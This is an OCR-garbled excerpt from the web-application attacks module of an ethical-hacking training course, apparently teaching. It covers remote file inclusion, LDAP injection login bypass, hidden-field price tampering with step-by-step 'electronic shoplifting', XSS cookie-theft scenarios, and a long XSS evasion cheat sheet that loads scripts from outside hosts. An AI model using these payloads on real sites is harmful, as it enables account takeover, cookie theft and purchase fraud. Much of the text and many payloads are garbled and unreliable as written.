$ d r in k = 'c o k e ';
i f ( i s s e t ( $ _ G E T [ 'DRINK'] )
$d r i n k = $ _ G E T [ 'DRINK'] ;
r e q u i r e ( $ d r in k . ' .p h p ’ ) ;
?>
©
$ d r in k
r e q u i r e ( J
.....:‫ך‬
G O
<form m eth od = " get">
< s e l e c t name="DRINK">
< o p tio n v a lu e = " p e p si" > p e p si< /o p tio n >
< o p tio n v a lu e= " cok e ‫יי‬>coke< / o p t i on>
< / s e le c t >
C input ty p e ="su b m it">
</form >
C lient code running in a b row ser
h t t p : // w w w .j u g g y b o y .c o m /o r d e r s .p h p ? D R I N K = h t t p : / / j a s o n e v a l . c o m / e x p l o i t ? <
File injection attacks enable attackers to e xp lo it
vulnerable scripts on the server to use a rem ote file
instead o f a presum ably trusted file fro m the local
file system
Attacker injects a
rem otely hosted file at
w w w .jasoneval.com
containing an exploit
e
A ttacker
F i l e I n j e c t i o n A t t a c k
Users are allow ed to upload various files on the server through various applications
and those files can be accessed through the Internet from anyw here in the w orld. If the
application ends w ith a php extension and if any user requests it, then the application
interprets it as a php script and executes it. This allows an attacker to perform a rb itra ry
com m ands. File injection attacks enable attackers to exploit vulnerable scripts on the server to
use a rem ote file instead o f a presum ably trusted file from the local file system. Consider the
follow ing client code running in a brow ser:
< form m e th o d = "g e t">
< s e le c t name="DRINK">
C o p tio n v a lu e = " p e p s i"> p e p s i< /o p tio n >
C o p tio n v a lu e = "c o k e "> c o k e < /o p tio n >
< /s e le c t>
< in p u t ty p e = "s u b m it">
< / forra>
V ulnerable PHP code
<?php
$ d rin k = 'c o k e ';
Module 13 Page 1773

i f ( is s e t ( $_G E T ['D R IN K '] ) )
$ d rin k = $_GET[ 'DRINK' ] ;
r e q u ir e ( $ d rin k . ' .p h p ' ) ;
?>
To exploit the vulnerable php code, the attacker injects a rem otely hosted file at
w w w .jasoneval.com containing an exploit.
E xploit code
http ://w w w .iuggvboy.com/orders. php?DRINK=http://iasoneval.com /exploit?
Module 13 Page 1774

W h a t I s L D A P I n j e c t i o n ? C E H
I (•rtifwtf itfciul ■UtlM
An LDAP in je c tio n te c h n iq u e is used to ta k e a d va n ta g e o f n o n -v a lid a te d w e b
a p p lic a tio n in p u t v u ln e ra b ilitie s to pass LDAP filte rs used fo r se a rch in g D ire c to ry
Services to o b ta in d ire c t access to d a ta b a se s b e h in d an LDAP tre e
Filter
Syntax
O perator
( a tt r ib u t e N a m e o p e r a t o r v a lu e )
Example
= (a b je c tc la s s = u s e r)
> = (mdbStorageQuota>=l00000)
< = (mdbStorageQuota<=l00000)
~ = (d i sp 1ayName~=Foecke1e r )
* (displayName—* Jo h n *)
AND (&)
OR (|)
(&(o b je c tc la s s -u s e r) (displayNam e—John)
(|(o b je c tc la s s = u s e r) (displayName=John)
N O T(!) ( fo b je ctC la ss= g ro u p )
LDAP D irectory Services
store and organize
inform ation based on its
attributes. The inform ation
is hierarchically organized
as a tree o f directory
entries
LDAP is based on the
dient-server model and
clients can search the
directory entries using
filte rs
(*■
a.
WJ
Q
J
V)•pH
(0
A
*
W h a t i s L D A P I n j e c t i o n ?
An LDAP (Lightw eight D irectory Access Protocol) injection attack works in the same
way as a SQL injection attack. All the inputs to the LDAP m ust be properly filtered, otherw ise
vulnerabilities in LDAP allow executing unauthorized queries or m o d ifica tio n o f the contents.
LDAP attacks e xp lo it web-based applications constructed based on LDAP statem ents by using a
local proxy. LDAP statem ents are m odified when certain applications fail. These services store
and organize inform ation based on its attributes. The inform ation is hierarchically organized as
a tree o f directory entries. It is based on the client-server m odel and clients can search the
directory entries using filters.
Module 13 Page 1775

( a t t r i b u t e N a m e o p e r a t o r v a l u e )
Example
Filter
Syntax
O perator
(d i splayN am e~=F oec k e le r )
(d i splayN am e=*Joh n *)
(S (o b je c tc la s s = u s e r )(d is p la y N a m e = J o h n )AND (&)
OR ( | ) (& (ob j e c t d s s s = u s e r ) (d±splayN am e=John)
NOT (I) ( !o b je c tC la s s = g r o u p )
FIGURE 1 3 .1 0 : LDAP In je c tio n
Module 13 Page 1776

H o w L D A P I n j e c t i o n W o r k s C E H
n
LDAP
LDAP Server
Normal Query
+ Code Injection
Normal Result and/or
Additional Information
LDAP
Normal Query
Normal Result
ClientLDAP ServerClient
LDAP injection attacks are sim ilar to SQL injection attacks b ut e x p lo it user param eters to generate LDAP query
To test if an application is vulnerable to LDAP code injection, send a query to the server m eaning th a t generates
an invalid input. Ifth e LDAP server re tu rns an e rro r, it can be exploited w ith code injection techniques
If an attacker enters valid user name "juggyboy",
and injects juggyboy)(&)) then the URL string
becomes (&(USER=juggyboy)(&))(PASS=blah)) only
the first filter is processed by the LDAP server, only
the query (&(USER=juggyboy)(&)) is processed.
This query is always true, and the attacker logs into
the system without a valid password
Account Login
| 1‫״‬ v ! Username juggyboy)(&))
1Vv. : Password blah
S u b m itA ttacker
Copyright © by E&Coinal.All Rights Reserved. Reproduction is Strictly Prohibited.
H o w L D A P I n j e c t i o n W o r k s
( H U LDAP injection attacks are com m only used on w eb applications. LDAP is applied to any
o f the applications th a t have some kind of user inputs used to generate the LDAP queries. To
test if an application is vulnerable to LDAP code injection, send a query to the server th a t
generates an invalid input. If the LDAP server returns an error, it can be exploited w ith code
injection techniques.
Depending upon the im plem entation of the target, one can try to achieve:
© Login Bypass
© Inform ation Disclosure
e Privilege Escalation
© Inform ation A lteration
Module 13 Page 1777

N orm al Q uery
N orm al Result
LDAP Server
Normal operation
*•‫י־‬
Client
FIGURE 1 3 .1 1 : N o rm a l o p e ra tio n
Operation with code injection
<
Client
FIGURE 1 3 .1 2 : O p e ra tio n w ith co d e in je c tio n
Attack
If an attacker enters a valid user name o f "ju g g y b o y " and injects ju g g yb o y) (&)), then the URL
string becomes (& (user=ju g g yb o y) (&)) (P A S S =blah)). Only the first filte r is processed by the
LDAP server; only the query (& (USER=ju g g yb o y) (&)) is processed. This query is always true,
and the attacker logs into the system w ith o u t a valid password.
‫ץ‬
□ c LDAP
N orm al Q uery
+ Code Injection
N orm al Result a n d /o r
A dditional Info rm ation
LDAP Server
A ccount Login
U sern a m e juggyboy)(&))
: P assw ord blah
A tta c k e r
FIGURE 1 3 .1 3 : A tta c k
Module 13 Page 1778

H i d d e n F i e l d M a n i p u l a t i o n A t t a c k I C E H
A ttack Request
h t t p : / /w w w . ju g g y b o
y . c o m /p a g e . a s p x ? p r
o d u o t= J u g g y b o y % 2 0 S
h i r t & p r i c e = 2 . 00
N orm al Request
h t t p : / / w w w . ju g g y b o
o d u c t= J u g g y b o y % 2 O S
h i r t & p r ic e = 2 0 0 .0 0
HTML Code
< fo m method="post"
action^ " page.asp x" >
<in p u t type="hidden" name=
"PRICE" val ue200 . 0 0 " ‫־‬ ">
Product name: < inp u t type=
" te x t‫״‬ name="product"
v a lu e="Juggyboy S h ir t "X br>
Product p r ic e : 2 0 0 .00" X b r>
< inp u t type=" submit" valu e=
"submit" >
</form >
$ When a user makes selections on an HTML page, the selection is typically stored as form
field values and sent to the application as an HTTP request (GET or POST)
0 HTML can also store field values as hidden fields, which are not rendered to the screen by
th e browser, but are collected and subm itted as parameters during form submissions
6 Attackers can examine th e HTML code o f the page and change the hidden field values in
order to change post requests to server
Product Name Jugg yboy S h irt ^
[ 200 )Product Price
Submit
H i d d e n F i e l d M a n i p u l a t i o n A t t a c k
Hidden m anipulation attacks are m ostly used against e‫־‬com m erce websites today.
M any online stores face these problem s. In every client session, developers use hidden fields to
store client inform ation, including price o f the product (Including discount rates). At the tim e of
developm ent o f these such program s, developers feel th a t all the applications developed by
them are safe, but a hacker can m anipulate the prices o f the product and com plete a
transaction w ith price th a t he or she has altered, rather than the actual price o f the product.
For exam ple: On eBay, a particular m obile phone is fo r sale fo r $1000 and the hacker, by
altering the price, gets it fo r only $10.
This is a huge loss fo r w ebsite owners. To protect th e ir netw orks from attacks, w ebsite owners
are using the latest antivirus softw are, firew alls, intrusion detection systems, etc. If th e ir
w ebsite is attacked, often it also loses its credibility in the m arket.
W hen any target requests w eb services and makes choices on the HTML page, then the choices
are saved as form field values and delivered to the requested application as an HTTP request
(GET or POST). The HTML pages generally save field values as hidden fields and they are not
displayed on the m o n ito r o f the target but saved and placed in the form o f strings or
param eters at the tim e o f form subm ission. Attackers can exam ine the HTML code o f the page
and change the hidden field values in order to change post requests to the server.
< in p u t ty p e = ‫״‬ h id d e n " name= "PRICE" v a lu e = "2 0 0 . 00‫״‬ >
Module 13 Page 1779

P ro d u c t name: < in p u t typ e = " t e x t " n a m e = "p ro d u ct" va lu e = "Ju g g yb o y
S h ir t " x b r >
P ro d u c t p r ic e : 2 0 0 . 00"><br>
< in p u t ty p e = "s u b m it" v a lu e = 1's u b m it">
< /fo rm >
1. Open the htm l page w ith in an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden nam e=price value=200.00>").
3. M odify its content to a d iffe re n t value (e.g. "<type=hidden nam e=price value=2.00>").
4. Save the htm l file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden m anipulation.
A tta c k R e q u e st
h t t p : / / w w w . ju g g y b o
o d u c t= J u g g y b o y % 2 0 S
h i r t & p r i c e = 2 . 0 0
FIGURE 1 3 .1 4 : H id d e n F ie ld M a n ip u la tio n A tta c k
N o rm a l R e q u e st
HTM L Code
H id d e n F ie ld
P rice = 2 0 0 .0 0
h t t p : / /w w w . ju g g y b o
o d u c t= J u g g y b o y %2OS
h i r t f i p r i c e = 2 0 0 .0 0
1 ! "
<form m ethod="post"
;»nt‫־‬.‫־‬i n n s "p a g « .a«spx">
< in p u t typ e= " 11idden" name=
"PRICE" v a lu e = " 2 0 0 .00" >
P rod u ct nam e: < in p u t typ e=
" tex t" nam e="product"
valu e= " Ju ggyb oy S h ir t" X b r >
P rod u ct p r ic e : 200.00" > < b r>
< in p u t typ e=" sub m it" v a lu e =
"subn'.it,,>
< /fo r :‫>״‬
Module 13 Page 1780

C ross-site s c rip tin g (,XSS' or'C SS') a tta cks e x p lo it v u ln e ra b ilitie s in d y n a m ic a lly g e n e ra te d w e b pages,
w hich ena b les m a licio u s a ttackers to in je c t c lie n t-s id e sc rip t in to w eb pages vie w e d by o th e r users
It occurs w h e n in v a lid a te d in p u t d a ta is in clu d e d in d yn a m ic c o n te n t th a t is se n t to a user's w e b b ro w se r
fo r re n d e rin g
A ttacke rs in je c t m a licio u s JavaS cript, VBScript, A ctiveX , HTML, o r Flash fo r exe cu tio n on a v ic tim 's system by
h id in g it w ith in le g itim a te re qu e sts
Session hijacking
Brute force password cracking
Data theft
Intranet probing
Keylogging and rem ote monitoring
Malicious script execution^‫ם‬
Redirecting to a malicious server^
^I IExploitinguserprivileges
1'Ads in hidden !FRAMES and pop-ups^‫׳‬ ^
^Datamanipulation
C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Proh ibited
C r o s s - S i t e S c r i p t i n g ( X S S ) A t t a c k s
Cross-site scripting is also called XSS. V ulnerabilities occur when an attacker uses web
applications and sends malicious code in JavaScript to d iffe re n t end users. It occurs w hen
invalidated input data is included in dynam ic co n te n t th a t is sent to a user's w eb brow ser fo r
rendering. W hen a w eb application uses input from a user, an attacker can com m ence an
attack using th a t input, which can propagate to oth e r users as w ell. Attackers inject m alicious
JavaScript, VBScript, ActiveX, HTML, or Flash fo r execution on a victim 's system by hiding it
w ith in legitim ate requests. The end user may tru st the w eb application, and the attacker can
exploit th a t tru st in order to do things th a t w ould not be allow ed under norm al conditions. An
attacker often uses d iffe re n t m ethods to encode the m alicious portion (Unicode) o f the tag, so
th a t a request seems genuine to the user. Some o f them are:
© M alicious script execution - Session hijacking
© Brute force password cracking - Redirecting to a m alicious server
Q Exploiting user privileges - Data th e ft
Q Intranet probing - Ads in hidden !FRAMES and pop-ups
© Data m anipulation - Keylogging and rem ote m onitoring
Module 13 Page 1781

C E HH o w X S S A t t a c k s W o r k
T h is e x a m p le u ses a
rable page w h ich h a n d le s
fo r a n o n e x is te n t pages,
a classic 404 e rro r page
(H a n d le s r e q u e s ts f o r a
n o n e x is te n t p a g e , a
classic 4 0 4 e r r o r p a g e )
N o rm a l R e q u e s t
S e rv e r
h t t p : / / ju g g y b o y .c o m /< s c rip t> a le rt( "WARNING: The a p p lic a tio n
has enco unte red an e r r o r ‫״‬ ) ;< /s o r ip t>
S H o w X S S A t t a c k s W o r k
To understand how cross-site scripting is typically exploited, consider the follow ing
hypothetical exam ple.
(Handles requests for a
nonexistent page, a
clastic 4 0 A erro r page)
n
Server
Normal Request
h t t p : / / ju g g y b o y .c o m /‫כ‬ a s o n _ f il« .h tm l
Server Code
< h f c m l>
<body>
<? php
p r in t "Not fou nd : "
u r ld ea o d e ($_SERVER["
REQUEST_URI"] ) ;
?>
</bod y>
< /h tm l>
404 Not found
/ j a s o n _ f i l e . h tm l
Server Response
XSS Attack Code
Server Response
h ttp ://ju g g y b o y .c o a a /< 3 c rip t> a le rt("W A R N IN G : The a p p li c a ti o n
h a s • n c o u n t« r* d an •rx ro r" ) ; < / s c r i p t >
FIGURE 13.15: How XSSAttacks Work
Module 13 Page 1782

C E H
C r o s s - S i t e S c r i p t i n g A t t a c k
S c e n a r i o : A t t a c k v i a E m a i l
User clicks
the m alicious link
Hi, You have w o n a
lo tt e ry o f $ 2 M , d ick
th e lin k t o claim it.
<A
H R E F =http;//juggyboy.
com /....
S e n d s e m a il w ith
m a lic io u s lin k
S e r v e r s e n d s a
p a g e t o t h e u s e r
w ith c lie n t p ro file
<..................
Name: Shaun
Age: 31
Location: UK ^
Occupation: SE
Last visH: Sept 21,2010
M a lic io u s c o d e is e x e c u te d
o n t h e c lie n t w e b b r o w s e r
Attacker
In this example, the attacker crafts an email message w ith a malicious script and sends it to the victim :
< A H R E F = h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t i o n . c g i ? c l i e n t p r o f i l e = < S C R I P T >
m a l i c i o u s c o d e c / S C R I P T » C lic k h e r e < / A >
W hen the user clicks on the link, the URL is sent to legitim ateS ite.com w ith the malicious code
The legitim ate server sends a page back to th e user including the value o f c l i e n t p r o f i l e , and the malicious
code is executed on the client machine
C r o s s - S i t e S c r i p t i n g A t t a c k S c e n a r i o : A t t a c k v i a E m a i l
In a crosssite scripting attack via em ail, the attacker crafts an em ail th a t contains a link
to m alicious script and sends it to the victim .
M alicious Script:
<A HREF=h t t p : / / le g it im a t e S it e . c o m /r e g is tr a tio n . c g i? c lie n tp ro file = < S C R IP T >
m a lic io u s c o d e < /S C R IP T » C lic k he re < /A >
W hen the user clicks on the link, the URL is sent to legitim ateSite.com w ith the m alicious code.
Then the server sends a page back to the user including the value o f client profile and the
m alicious code is executed on the client's m achine.
The follow ing diagram depicts the cross-site scripting attack scenario attack via em ail:
Module 13 Page 1783

Sends em ail with
malicious link
R eq u e st Is re ce iv e d
by le g itim a te se rve r
FIGURE 1 3 .1 6 : A tta c k v ia E m a il
Module 13 Page 1784

X S S E x a m p l e : A t t a c k v i a E m a i l C E H
L e g itim a te
S e rve r
Mi
script
r r r 1
A tta c k e r's
S e rv e r
M a lic io u s
S crip t
< A H R E F = h t t p : / / ju g g y b o y b a n k . c a n /
r e g i s t r a t i o n . c x j i ? c l i e n t p r o f i l e = < S C R I P T >
m a l i c i o u s c o d e < / S C R I P T » C l i c k h e r e < / A >
U ser's
B ro w s e r
a m alicious lin k
th e URL to user and convince user to click on it
_ Request th e page
o ......................!•
Page w ith m alicious
— Run
© .......
X S S E x a m p l e : A t t a c k v i a E m a i l
The follow ing are the steps involved in an XSS attack via em ail:
1. Construct a m alicious link:
<AHREF=h t t p : / / ju g g y b o y b a n k .c o m /re g is tra tio n . c g i? c lie n tp ro file = < S C R IP T >
m a lic io u s code</S C R IP T >>C lick h ere< /A >
2. Email the URL to the user and convince the user to click on it.
3. User requests the page.
4. Legitim ate server sends a response page w ith m alicious script.
5. M alicious script runs on the user's browser.
Module 13 Page 1785

Legitimate
Server
IS
Attackers
Server
Malicious
Script
User's
Browser
<A HREF=http:/ / ^uggyboybeink . com/
r e g is t r a t io n . cg i? clien tp r o file= < S C R IP T >
m a lic io u s co d ec/S C R IP T » C lick here</A >
Q Construct a malicious link
FIGURE 1 3 .1 7 : A tta c k via E m ail
Module 13 Page 1786

C E H
X S S E x a m p l e : S t e a l i n g U s e r s '
C o o k i e s
A tta c k e r's
S e rv e r
U ser's M a lic io u s
B ro w s e r S crip t
Host a page w ith m alicious script
kV iew th e page hosted by th e attacker
@
^ ^ v i e w th e page hosted Dy th e attacker
HTML containing m alicious s c r i p t !
© - !......................‫ז‬...........................»
Run
C ollect user's cookies
R edirect to a ttacker's server
< .............................. (
Send th e request w ith th e user's cookies
X S S E x a m p l e : S t e a l i n g U s e r s * C o o k i e s
To steal the user's cookies w ith the help o f an XSS attack, the attacker looks fo r XSS
nerabilities and then installs a cookie stealer (cookie logger).vu
The follow ing are the various steps involved in stealing user's cookies w ith the help of XSS
attack:
1. A ttacker initially hosts a page w ith m alicious script
2. The user visits the page hosted by attacker
3. The attacker's server sends the response as HTML containing malicious script
4. The user's brow ser runs the HTML m alicious script
5. The Cookie Logger present in the m alicious script collects user's cookies
6. The m alicious script redirects the user to attacker's server
7. The user's brow ser sends the request w ith the user's cookies
Module 13 Page 1787

Attacker's
S e rv e r
I
‫ט‬
A tta c k e r's
S e rv e r
@
script
u ser’s co okies
user's co okies
Malicious
Script
scrip t
............................................................‫ז‬...................................
th e page h oste d b y th e a tta cke r
I I
c o n ta in in g m a liciou s
.......... •>
C ollect
1 1
.....d ' i I
th e re q u e s t w ith th e
se rver
‫מ‬
U se r's
B ro w s e r
1
I
a page w ith m a liciou s
‫י‬.................................‫ו‬..............................*
I
! ‫,-׳׳‬View
HTML
!<•
Run
R edirect to a tta cke r's
!<..........
Send
&
FIGURE 1 3 .1 8 : S te a lin g U sers' C oo kie s
Module 13 Page 1788

C E H
A tta c k e r's
S e rv e r
II
XSS E x a m p le : S ending an
U n a u th o rize d R equest
A tta c k e r's
S e rv e r
M a lic io u s
S crip t
U ser's
B ro w s e r
C onstruct a m alicious link
Page w ith m alicious script
th e URL td user and convince user to click on it
.......... *
R equest th e page
Run
An authorized request
Email
X S S E x a m p l e : S e n d i n g a n U n a u t h o r i z e d R e q u e s t
Using an XSS attack, the attacker can also send an unauthorized request. The
follow ing are the steps involved in an XSS attack intended to send an unauthorized request:
1. A ttacker constructs a m alicious link
2. Sends an em ail containing the URL to user and convinces user to click on it
3. The user's brow ser sends a request to the attacker's server fo r the page
4. The attacker's server in response to the user's request sends the page w ith m alicious
script
5. The user's brow ser runs the m alicious script
6. The m alicious script sends an authorized request
Module 13 Page 1789

FIGURE 1 3 .1 9 : S e n d in g an U n a u th o riz e d R e q u e st
Module 13 Page 1790

X S S A t t a c k i n B l o g P o s t i n g C E H
4 a ►
Malicious code
<script>onload=
window.Iocation=
'http://www.juggYboy.com'
</script>
is injecting the blog post
U se r re d ire cte d to a m a licio u s
w e b s ite ju gg yb oy.co m
M alicious W ebsite
W eb Application
1 3 5 X S S A t t a c k i n a B l o g P o s t i n g
The follow ing diagram depicts the XSS attack in a blog posting:
Malicious code
<script>onload=
w indow. location=
'http://w w w .juggybcy.com '
</script>
is injecting th e blog post
U s e r re d ir e c t e d t o a m a lic io u s
w e b s ite ju g g y b o y .c o m
A ttacker adds a m alicious script in
the com m e nt fie ld o f blog post
Malicious W ebsite
W eb Application
C om m ent w ith
m alicious link is
stored on the server
Database Server
FIGURE 13.20: XSS Attack in a Blog Posting
Module 13 Page 1791

X S S A t t a c k i n C o m m e n t F i e l d C E H
o o o o
Facebook acquires file-sharing service
New York-based start-up that lets users privately
and sporadicaty share fles through a drag-and-
drop interface with additional options----------
C om m ent
Jason, Ilove your blog post!
- Mark (mark@miccasoft.com)
Leave your com m ent
P o p u p W in d o w
U s e r v is its th e
I T e ch Po st
w e b s ite
H I
‫ן‬ H^lnVWnild
I <*......i
Malicious code
< s c rip t» a le rt ("H e ll
o WorId ") < / scrip t>
is injecting th e blog post
The a le rt p o p s u p as so o n
as th e w e b page is lo a d e d
C o m m e n t w ith
m a licio u s lin k is
sto re d o n th e s e rv e r
D a ta b a s e S e r v e r W e b A p p lic a t io n
J X S S A t t a c k i n a C o m m e n t F i e l d
M any Internet w eb program s use HTML pages th a t dynam ically accept data from■ . . . .
d iffe re n t sources. The data in the HTML pages can be dynam ically changed according to the
request. Attackers use the HTML w eb page's tags to m anipulate the data and to launch the
attack by changing the com m ents feature w ith a m alicious script. W hen the target sees the
com m ent and activates it, then the m alicious script is executed on the target's brow ser,
initiating m alicious perform ances.
Module 13 Page 1792

M a licio u s code
< s c r ip t > a le r t ( " H e l l
o W o r ld " ) < / s c r ip t >
is injecting the blog post
The alert pops up as soon
as the web page Is loaded
a a s
1 Icch Po M
1 ------- ---------- - ‫היי‬ ‫•יי‬ IMOM|n.Ort.TOlO
Facebook acquires file-sharing service
N#w York baved start ■upthat !•tt users privately
end sporadically share files through a drag and
drop interfece with Additional options.----------
Leave your com m ent
Jaso n , 11o v a y our blog post!
< s c r i p t > a l e r t ( H e l l o
W o r l d " ) < / s c r i p t >
Attacker adds a m alicious script
In the com m ent field o f blog post
Comment w ith m alicious
link is stored on the
server
Attacker
Pop up W indow
Web ApplicationDatabase Server
FIGURE 1 3 .2 1 : XSS A tta c k in a C o m m e n t F ield
Module 13 Page 1793

X S S C h e a t S h e e t H C E H
UilifM itkiul Mm few
XSS locator: ‫״‬;!-‫־‬‫־‬<XSS>=&{()}
N orm al XSS JavaScript injection: <SCRIPT
SRC=http ://h ax ke rs .o rg /xs s.jsx /S C R IP T >
Em bedded carriage return: <1MG
SRC‫־־‬ jav&#xOD;ascript :alertfXSS‫״;(־‬>
NuN Chars: p eri -e 'p rin t "<1MG
SRC=javaOscrip t:ale rt("XSS" )>";'> out
IM G Dynsrc: <1MG
DYNSRC‫־‬‫״‬javasaip t alertCXSS‫״(־‬>
IM G lowsrc:<IMG
DYNSRC‫־‬ "Javasalpt:ale r tf XSS‫>־(־‬
Image XSS: <IM G SRC=‫־־‬javascript:alert('XSS‫>";)־‬ Non-alpha-non-digit XSS: <SCR1PT/XSS
SRC=" http^/ha.dcers^fg/xss.js" x/SC R !PT>
IM G lowsrc:<IMG
LOWSRC="javascript :alert('XSS')">
N o q u o tes an d no semicolon: <IMG
SRC=javascript:alert(‫־‬XSS')>
Non-alpha-non-digit part 2 XSS: <BODY
onload ! # $ % & ( ) - + 1 / ] @?;:,.‫־‬ K '= ale rt< ‫״‬XSS‫>)״‬
BGSOUND:<BGSOUND
<'(;‫־׳‬javasalp t :ale rt('XSS‫־‬‫״‬SRC
Case insensitive XSS attack vector: <IM G
SRC=JaVaScRIPt:alert('XSS')>
Extraneous open brackets:
«SCRJPT>alert("XSS") ; / / « / SCR1PT>
LAYER:<LAYER SRC=
"h ttp ://h a x k e rs .o rg / scriptle th tm T x/L A Y E R >
HTML entitles: <1MG
SRC=javascr ip t:ale rt (&q u o t;XSS&q u o t;)>
No dosing script tags: <SCRIPT
SRC=http://ha.ckers.org/xss.js?<B>
‫־‬STYLE sheet: <LINK REL="stylesheet
<*(;‫״‬javasalp t :ale rt( ,XSS‫־'־‬HREF
Grave accent obfuscation: <IMG
SRC= javascript :alert(" RSnake says, 'X S S 'T >
Protocol resolution in script tags: <SCRIPT
SRC‫/־‬/h a x k e rs.o rg /.j>
Local htcfile:<XSSSTYLE‫־‬ "behavk>r:
urHxssJttc);">
M alfo rm ed IMG tags:<IMG
‫״‬‫־־‬ " xS C R IP T > ale rtf XSS" )</SCRIPT>" >
Em bedded tab: <IM G SRC«"Jav
ascript:aiert('XSS');H>
Half open HTML/JavaScript XSS vector: <IMG
SRC=‫־‬‫־‬javascript :alert('XSS')"
Double open angle brackets: < lfram e
src‫־‬ h ttp ://h a .c k e rs.org/scriptlet.htmi <
VBscript in an Image: <IMG
SRC*‫־‬v b s a ip t:m sgbox(‫״‬XSS")’>
Mocha: <IM G SRC‫־‬"Hvescript:[code]">
Em bedded encoded tab: <IMG
SRC‫־‬‫־‬jav	ascrlpt:ale rt (,XSS‘);" >
Em bedded tab: <IM G SRC="jav
ascript:aiert('XSS');">
Em bedded encoded tab: <IMG
SRC‫־‬‫״‬)av& #x09;asalp t:ale rt (,XSS‫";)־‬ >
Em beded new line: <IMG
SRC="jav&#xOA;ascript:alert('XSS');">
XSS w ith no single q uotes or double quotes or
semicolons: SCRIPT>alert(/XSS/source K/SCRIPT>
Escaping JavaScript escapes: ‫;״‬alert('X SS');//
End title tag:
</TTTlExSCRJPT>aiert(“XSS“);</SCRlPT>
INPUT im age :<IN PUT TYPE=" IMAGE"
SRC*"Javascrip t:ale rt ('XSS');‫״‬ >
US-ASCII encoding: isaiptualert(E XS SE)i/saiptu
META:<META HTTP-EQUfV-"rafrash"
CONTENT="0;uH=javascript:alert(‫־‬XSS‫>”;)׳‬
TABLE:<TABLE
BACKGROUN D‫־־־‬javascript:alert( ‫־‬XSS‫>״(־‬
TD:<TABLExTD
BACKGROUN D‫־‬‫״‬javasalp t :alert(*XSS‫>״(־‬
C o p yrig h t © by E & C a u ic fl. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
X S S C h e a t S h e e t
Embedded carriage re tu rn :‫י‬.IMG
S R C =*jfg^ k O O .a sc n p t a t e ft f X S S '^
M * O m n (K fl.-e *print ‫־‬ <*A G
SRC-yn vn O scn pta*ertf*X S S V > out
W:m‫־‬a!pr»»-n&n‫־‬Ctg:t XSS <SCR1FT/XSS
S H C :*n ttp y /h a ckers org/KSS.js‫־‬xV SC R IF T >
p v t 2 XSS <SOOY
) • ‫־‬‫־‬‫־‬* ■ - ? * I / - X S S ‫>>״‬
Evtraneous open brackets
< <SCRIFT>«»eft ( TCSS‫״‬y /« /5 C W F T >
No O asu^ senpt f g z . <SOUFT
SRC=attpy/aa.ciLers.org/css.js*«:*>
Protocol resolution m senpt tags <SCRIPT
SRC=//fca.clters.org/.j>
H a*f o p e• K T M t/ja va S c n p t X 5 vector d M G
S R C = *|» v« 5q n jt^ier^ X S S 7 '
Dootrte open angle Dradcets
gty^tittpy/ha.cfcers.org/sertpttet.fttmi <
XSS w r tt bo saftgte Quotes or dow&te quotes or
semacoftoaa: S C R *T>«lert(/X SS /-S0«1rc e> < /S a1FT>
Escaping J r a S c n p t escapes W a t e r * ‫־‬x s s y /
Ena title tag
< /T T m x s c R ^ > a ie r t( * x s s * W s a a P T >
INPUT ■ m n ■ JM FVT T Y P E=*IN »G E'
'i M K r a t f ,^‫>״‬
FIGURE 13.22: XSS Cheat Sheet
•M G (SK iC ^clM G
0vNs*c‫־־‬a»ist1«jusdi“ st ‫׳‬
M G If w V C < M 6
SGSOUND.-SGSOL'ND
S^ WOBSaRSJUSCft*” >‫»־‬
LAVER •LAYER SHC=
* H ttp y /n a .A efs.org/scr1p tiet-M m J ‫״‬x /lA Y E R >
STY U sheet: <UNK R E U -g T fe ttc g r
HREF=‫־‬ttW650£lJJ1>fOiXSS ‫־‬‫־‬ >
local M c.foe <XSS S T 1 U = '» e M w o r
VBscript in an im age. <JMG
SRC=Vtecript:msgtX)»cf*XSS7‫׳‬ >
M o c M <JMG SRC=‘ 1nrescnpt:JcodeI*>
US-ASOI encoding g O T p ya> m lE X S S E fJxz> plv
M E T A <M E T A K T T F -E Q IW r-re fies a *
C 0 t a e m = ’ 0 :m t= ffrK a T ft: * e r t fxSS V >
TABLE cTABLE
b a c x g r o u n o = ^^ t y i p t t £ r t j r c s s f >
T D x T A U fx T O
ia c k g r o u m >=‫־‬*avascrwt a*ertfTCSS7‫־‬>
XSS locator ‫־‬ '.‫׳‬-‫־‬ < X S S > = *{()}
►normal XSS ;a v a S a ip t inaction <SCRIFT
SRC=nttp J fha tte rs o rg /c ss jsx /S C R IP T >
‫*״‬p « * 6 ■*‫״‬‫־‬
Mo qiKrtrc • 4 ‫ח‬ m jem icoto •: <1MG
Case *nsensitrve XSS a t t a o vector < « *G
H TML entrties *IM G
G rave accent o d fascatioa: < IM G
S R C 0 & ‫־‬6 0 1‫נ‬ « * «6 8‫מ‬8‫־‬ S & C T V TCSS")'>
M arfo rm eo IM G tags ■:IMG
‫׳‬ * * xSC RIPT>aJert{ ‫־‬XSS‫־‬ ></SCRIPT>‫״‬>
Emoedded ta tr <JMG SRC=*jav
w ^ t a k r ^ TCSS'J;‫״‬>
Emoeooefl encoded tab: <IM G
SRC=*jjx&*»c09;ascnpt a*ert('X S S '>/ >
Embedded t a t <1MG SRC=‫־‬jay
s‫״‬ss!‫׳‬sji‫־‬«s'>:‫>־‬
Embedded encoded t a d : « IMG
SR C = '0x^acO 9;ascn p t n»ert(‫־‬XSS‫)־‬;'>
'fflww‫‘•״•״‬ <**G
S *C ‫־‬ ‫־‬ !w |M 1 « flA » n p t» l« rtlT C S S ).‫־‬ >
Module 13 Page 1794

Cross-Site Request Forgery (CSRF)
A ttack c(*rtifxd 1
E l
lt»K4l IlM

tm
J C ross-Site R equest F o rg ery (CSRF) a tta c k s e x p lo it w e b p a g e v u ln e ra b ilitie s th a t a llo w an a tta c k e r to fo rc e an
u n su sp e ctin g user's b ro w s e r to send m a lic io u s re q u e sts th e y d id n o t in te n d
J T he v ic tim u ser h o ld s an a c tiv e session w ith a tru s te d s ite a nd s im u lta n e o u s ly visits a m a lic io u s site , w h ic h
in je c ts an HTTP re q u e s t fo r th e tru s te d s ite in to th e v ic tim user's session, c o m p ro m is in g its in te g rity
M alicious W ebsite
...... 1 ©
© 41!
fc
Trusted W ebsite
> ___Logs into the trusted site and
:sion
. . .
Sends a request fro m th e user's
! using his session coo kie
creaitesa new s!
Stores th e session ident fie rfo rth e ‫י‬
